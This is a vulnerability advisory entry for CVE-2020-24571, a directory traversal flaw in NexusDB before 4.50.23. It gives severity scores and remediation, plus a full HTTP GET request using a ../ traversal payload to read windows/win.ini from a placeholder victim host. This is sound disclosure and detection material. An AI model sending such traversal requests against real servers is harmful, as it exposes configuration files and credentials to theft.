| Title | NexusDB <4.50.23 - Local File Inclusion |
|---|---|
| Author | pikpikcu |
| Severity | High |
| Impact | An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data. |
| Remediation | Upgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.9242 |
| CVE ID | CVE-2020-24571 |
| CWE ID | CWE-22 |
| Tags | cve cve2020 nexusdb lfi vuln |
NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.
GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24571.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-24571.pcap
N/AN/A